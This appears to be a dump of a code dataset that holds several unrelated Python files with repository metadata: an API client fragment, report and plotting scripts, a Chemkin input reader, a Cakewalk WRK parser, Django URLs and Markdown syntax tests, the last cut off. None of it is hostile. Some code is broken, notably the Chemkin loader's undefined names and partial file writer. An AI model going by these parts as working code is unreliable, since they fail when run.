return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysGetRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Returns the list of all keys that belong to a project.
Args:
request: (RecaptchaenterpriseProjectsKeysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1ListKeysResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['pageSize', 'pageToken'],
relative_path='v1/{+parent}/keys',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysListRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1ListKeysResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='PATCH',
method_id='recaptchaenterprise.projects.keys.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['updateMask'],
relative_path='v1/{+name}',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysPatchRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
|
[
"ige-public@hotmail.com"
] |
ige-public@hotmail.com
|
719be2b3109d684559aae549572f8a866a01604c
|
f576a300274a5f491d60a2fbd06b276dac65a5da
|
/volumes.py
|
0a9a83f7c188b30aa4838f056887c48563f2e116
|
[] |
no_license
|
kashley007/SurgicalVolumes
|
76d81327987c7bf280ffd1a33057ae00495a1797
|
a5952f2cc169f45ad1fb9e3076e504f9443ed473
|
refs/heads/master
| 2020-07-21T19:36:50.317517
| 2016-11-16T17:25:07
| 2016-11-16T17:25:07
| 73,842,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,660
|
py
|
"""
This module executes the calculation of OR volumes
and creates a pdf report for each location found in the
data set
"""
#Import Libraries----------------------------------------------------------
import calendar
import command_line_args
import import_from_excel
import PDF
import df_manip
import endo
#--------------------------------------------------------------------------
def run_volumes_report(df, args):
"""Run a volumes report taking the parameters of df(DataFrame) and args(command-line arguments)"""
#Get all locations
location_df = df.Location.unique()
location_df = sorted(location_df, reverse=True)
if (args.month and args.year):
month_num = int(args.month)
month = calendar.month_name[month_num]
year = int(args.year)
df_month_year = df_manip.apply_month_year_filter(df, month_num, year)
total_case = 0
for i in location_df:
#Get data for month and year given at command-line
df_location = df_manip.apply_location_filter(df_month_year,i)
if(i == 'CRMH MAIN OR' ):
df_endo = endo.get_endo_cases(df_location)
total_case = len(df_endo.index)
#create PDF for location_df[i]
PDF.create_pdf(df_location, month, year, i, total_case)
else:
print("Not yet built")
#--------------------------------------------------------------------------
def main():
"""Main Program Execution"""
args = command_line_args.handle_command_line_args()
df = import_from_excel.get_excel_data(args)
run_volumes_report(df, args)
if __name__ == "__main__":
main()
|
[
"kdashley@carilion.com"
] |
kdashley@carilion.com
|
6bf0a913bcc4d96db71c5ad8e16ab1214ef394f8
|
51bd1f17a4e9942128b2c0824d397ebb74067e4c
|
/py_box3/mkm/chemkin/__init__.py
|
9f2981ce6f8ee408e5b347aef0ba9261ee2bc6fb
|
[] |
no_license
|
jonlym/py_box
|
3290db8fab2ca97fbd348d02ae4a3319207ccfb0
|
ae5187a433ef654d6b96ee98ca7ab742d83d11d9
|
refs/heads/master
| 2021-01-19T05:42:10.056427
| 2018-12-20T18:44:01
| 2018-12-20T18:44:01
| 87,442,931
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,054
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 23 14:57:39 2016
@author: Jonathan Lym
"""
from py_box3.constants import T0, convert_unit
from ase.io import read
from py_box3.thermo.thermdat import Thermdat
from py_box3.thermo.thermdats import Thermdats
import numpy as np
class Chemkin(object):
def __init__(self,
species = None,
sites = None,
reactions = None,
BEPs = None,
LSRs = None,
DOEs = None,
GAs = None,
SAs = None,
StatpQ = None,
reactor_type = 1,
n_runs = 1,
multi_input = True,
standard_T_and_P = True,
Ts = [],
Ps = [],
Qs = [],
SA_Vs = [],
T_rise = 0.,
isothermal = True,
linear_T_ramp = False,
external_T = 923.,
heat_transfer_area_to_volume = 3.571,
heat_transfer_coefficient = 0.,
TPD_ramp = 0.,
MARI = '',
reactant = '',
volume = 100.,
nnodes = 1,
ttout = 1.e-2,
rtime = 1.e-4,
ntdec = 10.,
save_transient = False,
set_equation_tolerance = True,
absolute_tolerance = 1.e-10,
relative_tolerance = 1.e-8,
non_negative_composition = True,
restart_max = 0,
use_iterative_solver = False,
upper_bandwidth = 0,
lower_bandwidth = 0,
use_coverage_effects = False,
use_binding_energy_corrections = False,
use_BEPs = False,
use_LSRs = False,
use_different_activation_energy = False,
use_omega = False,
omega = 0.5,
T_ref = 1.,
reaction_path_analysis_mode = 1,
verbose_reaction_path_analysis = False,
reaction_path_analysis_T = 900.,
sensitivity_analysis = False,
design_of_experiments = False):
#Objects
self.species = species
self.sites = sites
self.reactions = reactions
self.BEPs = BEPs
self.LSRs = LSRs
self.DOEs = DOEs
self.GAs = GAs
self.SAs = SAs
self.StatpQ = StatpQ
#Reactor parameters
self.reactor_type = reactor_type
self.n_runs = n_runs
self.multi_input = multi_input
self.standard_T_and_P = standard_T_and_P
self.Ts = Ts
self.Ps = Ps
self.Qs = Qs
self.SA_Vs = SA_Vs
self.T_rise = T_rise
self.external_T = external_T
self.heat_transfer_area_to_volume = heat_transfer_area_to_volume
self.heat_transfer_coefficient = heat_transfer_coefficient
self.TPD_ramp = TPD_ramp
self.MARI = MARI
self.reactant = reactant
self.volume = volume
#Reactor Options
self.isothermal = isothermal
self.linear_T_ramp = linear_T_ramp
#Solver options
self.nnodes = nnodes
self.ttout = ttout
self.rtime = rtime
self.ntdec = ntdec
self.save_transient = save_transient
self.set_equation_tolerance = set_equation_tolerance
self.absolute_tolerance = absolute_tolerance
self.relative_tolerance = relative_tolerance
self.non_negative_composition = non_negative_composition
self.restart_max = restart_max
self.use_iterative_solver = use_iterative_solver
self.upper_bandwidth = upper_bandwidth
self.lower_bandwidth = lower_bandwidth
#Reaction options
self.use_coverage_effects = use_coverage_effects
self.use_binding_energy_corrections = use_binding_energy_corrections
self.use_BEPs = use_BEPs
self.use_LSRs = use_LSRs
self.use_different_activation_energy = use_different_activation_energy
self.use_omega = use_omega
self.omega = omega
self.T_ref = T_ref
#Output options
self.reaction_path_analysis_mode = reaction_path_analysis_mode
self.verbose_reaction_path_analysis = verbose_reaction_path_analysis
self.reaction_path_analysis_T = reaction_path_analysis_T
self.sensitivity_analysis = sensitivity_analysis
self.design_of_experiments = design_of_experiments
@classmethod
def from_INP(self, path = '.'):
sites = Sites.from_surf_inp(path = os.path.join(path, 'surf.inp'))
species = Species.from_thermdat(path = os.path.join(path, 'thermdat'))
species.get_sites(path = os.path.join(path, 'surf.inp'))
gas_reactions = Reactions.from_gas_inp(path = os.path.join(path, 'gas.inp'))
surf_reactions = Reactions.from_surf_inp(path = os.path.join(path, 'surf.inp'))
reactions = copy(gas_reactions).extend(copy(surf_reactions))
input_dict = self.read_tube_inp(path = os.path.join(path, 'tube.inp'), return_dict = True)
#Optional Objects
if tube_dict['use_BEPs']:
input_dict['BEPs'] = BEPs.from_BEP_inp(path = os.path.join(path, 'BEP.inp'))
if tube_dict['use_LSRs']:
input_dict['LSRs'] = LSRs.from_Scale_inp(path = os.path.join(path, 'Scale.inp'))
if tube_dict['design_of_experiments']:
input_dict['DOEs'] = DOEs.from_DOE_inp(path = os.path.join(path, 'DOE.inp'))
if tube_dict['use_GAs']:
input_dict['GAs'] = GAs.from_GA_inp(path = os.path.join(path, 'GA.inp'))
if tube_dict['sensitivity_analysis']:
input_dict['SAs'] = SAs.from_SA_inp(path = os.path.join(path, 'SA.inp'))
if tube_dict['use_binding_energy_corrections']:
input_dict['StatpQ'] = StatpQ.from_StatpQ_inp(path = os.path.join(path, 'StatpQ.inp'))
if tube_dict['multi_input']:
(Ts, Ps, Qs, SA_Vs) = self.read_T_flow_inp(path = os.path.join(path, 'T_flow.inp'))
if tube_dict['use_different_activation_energy']:
reactions.read_EAs_inp(path = os.path.join(path, 'EAs.inp'))
reactions.read_EAg_inp(path = os.path.join(path, 'EAg.inp'))
return cls(species = species, sites = sites, reactions = reactions, **input_dict)
def read_tube_inp(self, path = 'tube.inp', return_dict = True):
tube_dict = dict()
with open(path, 'r') as f_ptr:
i = 0
for line in f_ptr:
#Skip lines
if '!' == line[0] or 'EOF' in line:
continue
data = [x for x in line.replace('\n', '').split(' ') if x != '']
if i == 0:
tube_dict['reactor_type'] = int(data[0])
tube_dict['n_runs'] = int(data[1])
tube_dict['multi_input'] = char_to_boolean(data[2])
elif i == 1:
tube_dict['standard_T_and_P'] = char_to_boolean(data[0])
tube_dict['Ts'] = [float(data[1])]
tube_dict['Ps'] = [float(data[2])]
tube_dict['Qs'] = [float(data[3])]
tube_dict['SA_Vs'] = [float(data[4])]
tube_dict['T_rise'] = float(data[5])
elif i == 2:
tube_dict['isothermal'] = char_to_boolean(data[0])
tube_dict['linear_T_ramp'] = int(data[1])
elif i == 3:
tube_dict['external_T'] = float(data[0])
tube_dict['heat_transfer_area_to_volume'] = float(data[1])
tube_dict['heat_transfer_coefficient'] = float(data[2])
tube_dict['TPD_ramp'] = float(data[3])
elif i == 4:
tube_dict['MARI'] = data[0]
tube_dict['reactant'] = data[1]
elif i == 5:
tube_dict['volume'] = float(data[0])
tube_dict['nnodes'] = int(data[1])
tube_dict['ttout'] = float(data[2])
tube_dict['rtime'] = float(data[3])
tube_dict['ntdec'] = int(data[4])
tube_dict['save_transient'] = char_to_boolean(data[5])
elif i == 6:
tube_dict['set_equation_tolerance'] = char_to_boolean(data[0])
tube_dict['absolute_tolerance'] = float(data[1])
tube_dict['relative_tolerance'] = float(data[2])
tube_dict['non_negative_composition'] = char_to_boolean(data[3])
tube_dict['restart_max'] = int(data[4])
elif i == 7:
if data[0] == '0':
tube_dict['use_iterative_solver'] = False
elif data[0] == '1':
tube_dict['use_iterative_solver'] = True
else:
raise Exception('Invalid value for iSolver, {}'.format(data[0]))
tube_dict['upper_bandwidth'] = int(data[1])
tube_dict['lower_bandwidth'] = int(data[2])
elif i == 8:
tube_dict['use_coverage_effects'] = char_to_boolean(data[0])
tube_dict['use_binding_energy_corrections'] = char_to_boolean(data[1])
tube_dict['use_BEPs'] = char_to_boolean(data[2])
if data[3] == '0':
tube_dict['use_LSRs'] = False
elif data[3] == '3':
tube_dict['use_LSRs'] = True
else:
raise Exception('Invalid value for iScale, {}'.format(data[3]))
tube_dict['use_different_activation_energy'] = char_to_boolean(data[4])
tube_dict['use_omega'] = char_to_boolean(data[5])
tube_dict['omega'] = float(data[6])
tube_dict['T_ref'] = float(data[7])
elif i == 9:
tube_dict['reaction_path_analysis_mode'] = int(data[0])
tube_dict['verbose_reaction_path_analysis'] = char_to_boolean(data[1])
tube_dict['reaction_path_analysis_T'] = float(data[2])
tube_dict['sensitivity_analysis'] = char_to_boolean(data[3])
tube_dict['design_of_experiments'] = char_to_boolean(data[4])
i += 1
return tube_dict
def write_tube_inp(self, path = 'tube.inp'):
lines = []
lines.append('!irxtr (0=UHV/mol. beam, 1=batch, 2=cstr, 3=pfr) nruns MultiInput')
#lines.append('{}{}{}{}{}'.format(self.reactor_type))
lines.append('!lstp t[K] p[atm] velo[cm3/s] abyv[cm-1] trise[K]')
lines.append('!liso(yes=T,no=F) itpd (0=no, 1=UHV, 2=High Pressure) (itpd overrides liso)')
lines.append('!text aextbyv htc ramp [K/s]')
lines.append('!MARI Reactant')
lines.append('!rlen[cm3] nnodes ttout [s] rtime [s] ntdec ltra (F=only SS saved, T=transient saved)')
lines.append('!ltol abstol reltol NonNeg(F/T: constraints off/on) restart_max (<=0 means no limit)')
lines.append('!iSolver (0/1: iterative solver off/on) mu ml (upper/lower bandwidths for Krylov solver)')
lines.append('!lcov lStatpQ lBEP iScale lEA lomega omega Tref_beta (0: Tref=300K; 1: Tref=1K)')
lines.append('!mrpa verbose_rpa trpa lsen lDOE')
lines.append('EOF')
with open(path, 'w') as f_ptr:
f_ptr.write(lines[0])
def char_to_boolean(character):
if character.lower() == 't':
return True
elif character.lower() == 'f':
return False
else:
raise Exception('Invalid character, {}'.format(character))
def boolean_to_char(boolean):
if boolean:
return 'T'
else:
return 'F'
|
[
"jonathanalym@gmail.com"
] |
jonathanalym@gmail.com
|
6aaba7d662a21da85d2ba3e6b178f7ecf8d58cd2
|
e7b07f173a8bc0d36e046c15df7bbe3d18d49a33
|
/parse.py
|
9d1894ef9159fb1b51738dbba15b24d5bcb61bc0
|
[] |
no_license
|
jcarbaugh/makeitwrk
|
82b6e8079b118e8d668b2e6858096a54da33d5a8
|
83801b19c120b4cf728b8342c4933fefe54b54d8
|
refs/heads/master
| 2020-04-06T04:55:56.785930
| 2011-08-26T19:09:27
| 2011-08-26T19:09:27
| 2,275,931
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,029
|
py
|
#!/usr/bin/env python
from struct import pack, unpack
import sys
CHUNK_TYPES = {
1: 'TRACK_CHUNK',
2: 'STREAM_CHUNK',
4: 'METER_CHUNK',
5: 'TEMPO_CHUNK',
6: 'SYSEX_CHUNK',
7: 'MEMRGN_CHUNK',
10: 'TIMEBASE_CHUNK',
# variables
3: 'VARS_CHUNK',
26: 'VARS_CHUNK_VAR',
# device stuff
33: 'DEVICES',
# track stuff?
36: 'TRACK_NAME?',
54: 'TRACK_PORT',
45: 'TRACK_DATA?',
255: 'END_CHUNK',
}
def solomon(arr, parts):
for i in range(0, parts * 8, 8):
yield arr[i:i+8]
def chunk_reader(wrkfile):
if wrkfile.read(8) != b'CAKEWALK':
raise ValueError('invalid file format')
wrkfile.read(1) # byte I don't care about
mm_version = wrkfile.read(2)
major = ord(mm_version[1])
minor = ord(mm_version[0])
version = "%i.%i" % (major, minor)
yield ('VERSION_CHUNK', 2, None, version)
while 1:
ch_type_data = wrkfile.read(1)[0]
ch_type = CHUNK_TYPES.get(ch_type_data, ch_type_data)
if ch_type == 'END_CHUNK':
break
ch_len = unpack('i', wrkfile.read(4))[0]
ch_data_offset = wrkfile.tell()
#print(ch_data_offset)
ch_data = wrkfile.read(ch_len)
yield (ch_type, ch_len, ch_data)
yield ('END_CHUNK', None, None, None)
wrkfile.close()
if __name__ == '__main__':
for chunk in chunk_reader(sys.stdin):
print(chunk)
# if chunk[0] == 'TRACK_NAME?':
# (tnum, tname_len) = unpack('HB', chunk[2][:3])
# tname = chunk[2][3:3+tname_len].decode('utf-8')
# print("[%02i] %s" % (tnum, tname))
# elif chunk[0] == 'TRACK_DATA?':
# (tnum, schunks) = unpack('=HxH', chunk[2][:5])
# print(' ', '------------')
# for s in solomon(chunk[2][7:], schunks):
# print(' ', unpack('8B', s))
"""
__TRACK_DATA__
#2 ?? CNT- ???? 16---------------
0900 00 0700 0000 B649 009023641E00 D449 009028643C00 104A 00902B643C00 4C4A 009029643C00 884A 009023641E00 A64A 009023641E00 E24A 009023641E00
0900 00 0700 0000 1E4B 009023641E00 3C4B 009028643C00 784B 00902B643C00 B44B 009029643C00 F04B 009023641E00 0E4C 009023641E00 4A4C 009023641E00
(30, 75, 0, 144, 35, 100, 30, 0)
submeasure . . . .
measure. . . .
? . . . .
? . . .
nt? . .
? .
-----?
------------------------------------
0000 00 0800 0000 E010 009045643C00 1C11 009045643C00 5811 00904C643C00 9411 009045643C00 D011 00904D643C00 0C12 00904C643C00 4812 009048643C00 8412 009045643C00
0200 00 1400 0000 8016 00902664E001 3417 009026643C00 7017 009026647800 E817 009026647800 2418 009026643C00 6018 00902264E001 1419 009022643C00 5019 009022647800 C819 009022647800041A009022643C00401A00901F64E001F41A00901F643C00301B00901F647800A81B00901F647800E41B00901F643C00201C00902164E001D41C009021643C00101D009021647800881D009021647800C41D009021643C00
__TRACK_NAME__
#2 L2 NAME* INSTRUMENT?
0000 05 4F7267616E FFFF 1500 FFFFFFFF 00000000000000 0A 0000000000
O R G A N
0100 0B 536C617020426173732031 FFFF 2500 FFFFFFFF 00000000000000 0A 0000010000
S L A P B A S S 1
0200 0B 536C617020426173732032 FFFF 2400 FFFFFFFF 00000000000000 FE 0000020000
S L A P B A S S 2
0300 0C 4869676820537472696E6773 FFFF 2C00 FFFFFFFF 00000000000000 0A 0000030000
H I G H S T R I N G S
0900 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
-------------------------------------------
0000 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
"""
|
[
"jcarbaugh@gmail.com"
] |
jcarbaugh@gmail.com
|
0285e95057b21742ade89d9041421eb988eb90fb
|
d79c152d072edd6631e22f886c8beaafe45aab04
|
/nicolock/products/rest_urls.py
|
d58d9a92a31372b447067ee3dd7508ef1d810182
|
[] |
no_license
|
kabroncelli/Nicolock
|
764364de8aa146721b2678c14be808a452d7a363
|
4c4343a9117b7eba8cf1daf7241de549b9a1be3b
|
refs/heads/master
| 2020-03-11T11:02:43.074373
| 2018-04-18T17:38:33
| 2018-04-18T17:38:33
| 129,959,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from . import rest_views as views
urlpatterns = [
url(
regex=r'^products/(?P<pk>\d+)/$',
view=views.ProductDetail.as_view(),
name='product-detail'
),
url(
regex=r'^products/(?P<pk>\d+)/like/$',
view=views.ProductLike.as_view(),
name='product-like'
),
url(
regex=r'^categories/$',
view=views.CategoryList.as_view(),
name='category-list'
),
url(
regex=r'^categories/(?P<pk>\d+)/$',
view=views.CategoryDetail.as_view(),
name='category-detail'
),
]
|
[
"brennen@lightningkite.com"
] |
brennen@lightningkite.com
|
7cb0f559cf1a4f0d1a677006477fa65e55752236
|
b1e9991736e1fe83d3886dcb5c860dc94a31af2b
|
/matplotlibrc.py
|
dbebae19a11784998b797d88525705478349e408
|
[] |
no_license
|
bbw7561135/TurbulentDynamo
|
e98748171aff47cf3ec75db3b98e0b2c8dbdf280
|
cba1e7a06ea9434ff3d8d3f9e8482677b0274c2f
|
refs/heads/master
| 2022-12-25T03:37:12.973978
| 2020-08-31T01:11:24
| 2020-08-31T01:11:24
| 294,576,179
| 2
| 1
| null | 2020-09-11T02:42:17
| 2020-09-11T02:42:16
| null |
UTF-8
|
Python
| false
| false
| 1,166
|
py
|
from matplotlib import rcParams
# rcParams.keys()
rcParams['text.usetex'] = True
rcParams['text.latex.preamble'] = r'\usepackage{bm}'
rcParams['lines.linewidth'] = 1.2
rcParams['font.family'] = 'Arial'
rcParams['font.size'] = 15
rcParams['axes.linewidth'] = 0.8
rcParams['xtick.top'] = True
rcParams['xtick.direction'] = 'in'
rcParams['xtick.minor.visible'] = True
rcParams['xtick.major.size'] = 6
rcParams['xtick.minor.size'] = 3
rcParams['xtick.major.width'] = 0.75
rcParams['xtick.minor.width'] = 0.75
rcParams['xtick.major.pad'] = 5
rcParams['xtick.minor.pad'] = 5
rcParams['ytick.right'] = True
rcParams['ytick.direction'] = 'in'
rcParams['ytick.minor.visible'] = True
rcParams['ytick.major.size'] = 6
rcParams['ytick.minor.size'] = 3
rcParams['ytick.major.width'] = 0.75
rcParams['ytick.minor.width'] = 0.75
rcParams['ytick.major.pad'] = 5
rcParams['ytick.minor.pad'] = 5
rcParams['legend.fontsize'] = 15
rcParams['legend.labelspacing'] = 0.2
rcParams['legend.loc'] = 'upper left'
rcParams['legend.frameon'] = False
rcParams['figure.figsize'] = (8.0, 5.0)
rcParams['figure.dpi'] = 200
rcParams['savefig.dpi'] = 200
rcParams['savefig.bbox'] = 'tight'
|
[
"necokriel@gmail.com"
] |
necokriel@gmail.com
|
7ed42131d1dea6425f48f5cd8d6a580ebe0e2de1
|
8d150f92db0e12dcb32791892c0747ee50194cbb
|
/ex_01.py
|
120378ee94c80dc0412ae742805442adf5f209f5
|
[] |
no_license
|
wangbingde/class_day02
|
cbe1302668aa1cfe6b6a715ede149854627dc3ea
|
215cd1abb15bb31b70c62e344fe7e611a79a75b1
|
refs/heads/master
| 2020-04-07T07:10:59.613331
| 2018-11-19T05:33:51
| 2018-11-19T05:33:51
| 158,167,125
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
# 单继承
class Animal:
def eat(self):
print("吃")
def drink(self):
print("喝")
def run(self):
print("跑")
def sleep(self):
print("睡--")
class Dog(Animal):
def bark(self):
print("汪汪叫")
class XiaoTian(Dog):
def fly(self):
print("会飞")
wangcai =Dog()
wangcai.sleep()
wangcai.bark()
xiao=XiaoTian()
xiao.bark()
xiao.fly()
|
[
"1254817017@qq.com"
] |
1254817017@qq.com
|
2864f464a2a9b812262b8d20279d25c2d4d19566
|
e75d2b20e7afade2c9778ab5b68369d482cb9fd0
|
/Desafio007.py
|
d957e19b9877e2391eabb33cd577d0d1a74e3f22
|
[] |
no_license
|
tamaragmnunes/Exerc-cios-extra---curso-python
|
e09bb6e507e0b1c5a3f84ecec7dbb25b8aaf27f4
|
5bfd2674101f2f41001adcf3b65414b3ef6b57ba
|
refs/heads/master
| 2020-07-26T09:10:54.536729
| 2019-09-15T13:45:06
| 2019-09-15T13:45:06
| 208,599,544
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
#Desenvolva um programa que leia as duas notas de um aluno, calcule e mostre a sua média
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m =(n1+n2)/2
print('A sua média é {}'. format(m))
|
[
"noreply@github.com"
] |
tamaragmnunes.noreply@github.com
|
d3527c75633bd397f54893cab6262bed50e53879
|
d17d65a3ee48b307a46a0b95a05f04131668edbe
|
/TestSuite/runner.py
|
6a172fc2702d50f5b6f0558a2beab1d4f677a319
|
[] |
no_license
|
qlcfj001/ui_test
|
28fa370a6f912b2ff9a551c681d35a452c57ee02
|
25020af19d84c9c2b1bad02aca89cc881e828bbb
|
refs/heads/master
| 2023-06-15T18:10:02.177702
| 2021-07-15T06:35:10
| 2021-07-15T06:35:10
| 386,012,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
from Page.Base import base
from pageobjct.SearcH import Searchpage
from selenium.webdriver.common.by import By
#from TestSuite.Variablelayer.Variable import *
import time
import unittest
leave='成都'
leave_data="2021-07-20"
arrive='北京'
arrive_data='2021-07-30'
aa=Searchpage()
aa.search7(leave='成都',leave_data="2021-07-20",arrive='北京',arrive_data='2021-07-30')
|
[
"you@example.com"
] |
you@example.com
|
7355b8d086777562985e5de5563d15a37060c3e1
|
940b69579fdd126d254020469bbe54e553f8d7ea
|
/tests/test_markdown_light.py
|
0721fce994eb753acb8fe43a962d73ad7bb3ca13
|
[
"MIT"
] |
permissive
|
nvtkaszpir/MarkdownLight
|
9edca79dc5fb513cfa6ab3aae52b5ab4e7360b91
|
38ad22267aa7b6327e39564f7c6c864104353e21
|
refs/heads/master
| 2021-01-18T10:45:31.864370
| 2015-03-27T15:51:00
| 2015-03-27T15:57:35
| 32,994,951
| 2
| 0
| null | 2015-03-27T15:48:46
| 2015-03-27T15:48:46
|
Python
|
UTF-8
|
Python
| false
| false
| 22,066
|
py
|
import syntax_test
class TestMarkdownLight(syntax_test.SyntaxTestCase):
def setUp(self):
super().setUp()
self.set_syntax_file("Packages/MarkdownLight/MarkdownLight.tmLanguage")
def check_default(self, patterns):
self.check_in_single_scope(patterns, 'text')
def test_simple_text(self):
self.set_text('A B C')
self.check_default('A B C')
def test_italic(self):
self.set_text('''
A *B* _C_ D
*E*
''')
self.check_eq_scope([ r'\*B\*', '_C_', r'\*E\*' ], 'markup.italic')
self.check_eq_scope(r'[\*_]', 'punctuation.definition')
self.check_default(list('AD '))
def test_bold(self):
self.set_text('''
A **B** __C__ D
**E**
''')
self.check_eq_scope([ r'\*\*B\*\*', r'__C__', r'\*\*E\*\*' ], 'markup.bold')
self.check_eq_scope(r'[\*_]+', 'punctuation.definition')
self.check_default(list('AD '))
def test_inline_markup_inside_inline_markup(self):
self.set_text('''
A *B **C** D* E
F **G *H* I** J
''')
self.check_eq_scope(r'\*B \*\*C\*\* D\*', 'markup.italic')
self.check_eq_scope(r'\*H\*', 'markup.italic')
self.check_eq_scope(r'\*\*C\*\*', 'markup.bold')
self.check_eq_scope(r'\*\*G \*H\* I\*\*', 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(list('AEFJ'))
def test_bold_italic(self):
self.set_text('''
AA *__AB__* AC
BA _**BB**_ BC
CA **_CB_** CC
DA __*DB*__ DC
EA ***EB*** EC
FA ___FB___ FC
''')
self.check_eq_scope(r'\*__AB__\*', 'markup.italic')
self.check_eq_scope(r'_\*\*BB\*\*_', 'markup.italic')
self.check_eq_scope([ '_CB_', r'\*DB\*' ], 'markup.italic')
self.check_eq_scope([ '__AB__', r'\*\*BB\*\*' ], 'markup.bold')
self.check_eq_scope(r'\*\*_CB_\*\*', 'markup.bold')
self.check_eq_scope(r'__\*DB\*__', 'markup.bold')
self.check_eq_scope(r'\*+|_+', 'punctuation.definition')
self.check_eq_scope(r'\*\*\*EB\*\*\*', 'markup.bold')
self.check_eq_scope(r'\*\*\*EB\*\*\*', 'markup.italic')
self.check_eq_scope(r'___FB___', 'markup.bold')
self.check_eq_scope(r'___FB___', 'markup.italic')
self.check_default([ r'[A-Z]A ', r' [A-Z]C\n' ])
def test_multiline_markup_not_supported(self):
# Multiline inline markup is not supported due to
# limitations in syntax definition language.
self.set_text('''
A **B
C** D
E _F
G_ H
''')
self.check_default('.+')
def test_inline_markup_before_punctuation(self):
self.set_text('''
A *B*: *C*; *D*, *E*. *F*? G
K **L**: **M**; **N**, **O**. **P**? Q
''')
self.check_eq_scope([
r'\*B\*', r'\*C\*', r'\*D\*', r'\*E\*', r'\*F\*'
], 'markup.italic')
self.check_eq_scope([
r'\*\*L\*\*', r'\*\*M\*\*', r'\*\*N\*\*',
r'\*\*O\*\*', r'\*\*P\*\*'
], 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(r'[AGKQ:;,\.?]')
def test_inline_markup_inside_quotes_and_brackets(self):
self.set_text('''
A "*B*" (*C*) '*D*' E
K "**L**" (**M**) '**N**' O
''')
self.check_eq_scope([ r'\*B\*', r'\*C\*', r'\*D\*' ], 'markup.italic')
self.check_eq_scope([ r'\*\*L\*\*', r'\*\*M\*\*', r'\*\*N\*\*' ], 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(r'''[AEKQ"\(\)'\.]''')
def test_inline_markup_outside_quotes_and_brackets(self):
self.set_text('''
*"A"* *(B)* *'C'*
**"D"** **(E)** **'F'**
*"A";* *(B).* *'C':*
**"D"!** **(E)?** **'F',**
Z
''')
self.check_eq_scope([ r'\*"A"\*', r'\*\(B\)\*', r"\*'C'\*" ], 'markup.italic')
self.check_eq_scope([ r'\*\*"D"\*\*', r'\*\*\(E\)\*\*', r"\*\*'F'\*\*" ], 'markup.bold')
self.check_eq_scope([ r'\*"A";\*', r'\*\(B\)\.\*', r"\*'C':\*" ], 'markup.italic')
self.check_eq_scope([ r'\*\*"D"!\*\*', r'\*\*\(E\)\?\*\*', r"\*\*'F',\*\*" ], 'markup.bold')
self.check_default('Z')
def test_brackets_inside_inline_markup(self):
self.set_text('''
*A (B C)*: D
*(K)* **(L)**
''')
self.check_eq_scope([ r'\*A \(B C\)\*', r'\*\(K\)\*' ] , 'markup.italic')
self.check_eq_scope( r'\*\*\(L\)\*\*', 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(r': D')
def test_inline_markup_combinations(self):
self.set_text('_A _ B_C D_E _ F_ *G* **H** <a>_I_</a>')
self.check_eq_scope([ '_A _ B_C D_E _ F_',
r'\*G\*', '_I_' ], 'markup.italic')
self.check_eq_scope(r'\*\*H\*\*', 'markup.bold')
def test_escaping_of_inline_punctuation(self):
self.set_text(r'A *\*B\** C **D\*** E')
self.check_eq_scope(r'\*\\\*B\\\*\*', 'markup.italic')
self.check_eq_scope(r'\*\*D\\\*\*\*', 'markup.bold')
self.check_default(list('ACE '))
def test_inline_markup_does_not_work_inside_words(self):
self.set_text('A_B C_D_E')
self.check_default('.+')
def test_inline_markup_does_not_work_without_text(self):
self.set_text('''
A ____ B
''')
self.check_default('^.+$')
def test_valid_ampersands(self):
self.set_text('''
&
&&
A & B
A && B
& A &B && C &&D E& F&&
&G;
''')
self.check_no_scope('^.+$', 'invalid')
def test_valid_brackets(self):
self.set_text('''
<
<<
A < B
A << B
